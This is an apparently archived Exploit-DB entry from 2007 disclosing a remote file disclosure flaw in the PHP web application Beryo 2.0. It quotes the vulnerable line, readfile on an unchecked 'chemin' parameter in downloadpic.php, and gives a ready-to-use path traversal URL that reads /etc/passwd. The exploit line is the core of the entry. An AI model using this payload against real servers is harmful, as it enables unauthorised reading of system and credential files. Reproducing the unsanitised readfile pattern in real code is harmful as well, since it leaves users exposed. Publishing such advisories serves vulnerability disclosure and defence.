Beryo 2.0 - 'downloadpic.php?chemin' Remote File Disclosure

EDB-ID:

3676


Author:

GoLd_M

Type:

webapps


Platform:

PHP

Date:

2007-04-06


# Beryo 2.0(downloadpic.php chemin)Remote File Disclosure Vulnerability
# D.Script: http://www.xrousse.org/shared/beryo-2.0.tar.gz
# Discovered by: GolD_M = [Mahmood_ali]
# Homepage: http://www.Tryag.cc
# Greetz To: Tryag-Team & 4lKaSrGoLd3n-Team & AsbMay's Group
# V.Code: readfile("$chemin");
# Exploit:[Path_Beryo]/downloadpic.php?chemin=../../../../../../etc/passwd

# milw0rm.com [2007-04-06]